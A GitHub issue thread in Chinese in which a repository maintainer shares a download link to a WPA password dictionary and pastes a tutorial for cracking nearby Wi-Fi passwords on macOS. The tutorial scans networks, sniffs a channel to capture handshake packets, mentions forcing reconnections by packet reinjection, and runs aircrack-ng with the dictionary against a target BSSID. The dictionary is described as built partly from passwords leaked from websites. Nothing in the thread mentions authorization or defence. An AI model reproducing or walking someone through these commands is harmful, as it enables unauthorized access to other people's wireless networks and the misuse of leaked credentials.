### ISSUE TITLE
怎么下载不了相关文件?

### ISSUE THREAD

**Issue by xuemingyang** [TKanX/WPA-Dictionary#1]

**Comment by TKanX** [comment]
# 相关文件下载

我把字典打包一份给你。

下载链接: https://github.com/TKanX/WPA-Dictionary/releases/download/Password-dictionary-ZIP-package/WPA-password-dictionary.zip

依赖安装和使用在仓库`README.md`里面都讲了：

# 通过Aircrack-ng等工具获取Wifi密码

用户通过包含哈希加密的密码握手包与路由器建立连接以确认身份。那么拿到握手包就可以得到密码的哈希值。然后通过运行字典并比较哈希值，就可以得到密码的明文。

## Mac OS

### 安装`aircrack-ng`

使用`macport`安装

```shell
sudo port install aircrack-ng
```

### 数据包捕获-捕获带有密码的握手数据包

MacBook自带wifi工具：Airport

1. 首先，断开wifi

2. 检查周围的wifi
```shell
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
```

3. 检查本机的无线网卡设备
```shell
ifconfig
```
PS：MacOS的默认网卡是`en0`。如果没有外部网卡，则使用“en0”。

4. 抓包
`aircrack`可以利用网卡的监听模式来捕获周围的无线网络数据包。其中，对我们来说最重要的数据包是：包含密码的数据包——也称为握手数据包。当新用户或断线用户自动连接wifi时，会发送握手包。一种攻击方法是重注入数据包，它可以强制无线路由器重新启动，以便在用户自动连接时获得握手数据包。如果无线路由器用户较多，可以安静等待。

```shell
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6
```

5. 等待用户连接wifi并获取握手包。
等待获取握手包。抓包时间越长，获得握手包的机会就越大。

6. 停止抓包
```shell
^C
```
捕获的数据包保存在`/tmp`中

7. 破解wifi密码
这一步我们需要下载好的密码字典！

获得握手包后，我们还需要破解加密的密码。

好的密码字典应该包括常见的弱密码、手机号码、姓名和生日组合、各大网站泄露的密码、英文单词等。如果使用字典无法破解，则说明密码相当复杂；蛮力穷举更是费时费力。 （关于复杂密码的重要性）。

PS：本Github 存储库中提供了各种密码字典。

破解：

```shell
sudo aircrack-ng -w password.txt -b c8:3a:35:30:3e:c8 /tmp/
```

- `-w`：指定字典文件`.txt `格式
- `－b`：指定要破解的wifi BSSID

8. 破解结果
`KET FOUND! [ ******* ]`代表成功破解，`[ ******* ]`就是破解到的密码。

否则就是使用的字典文件里面没有正确的密码，然后就换一个字典文件继续尝试。
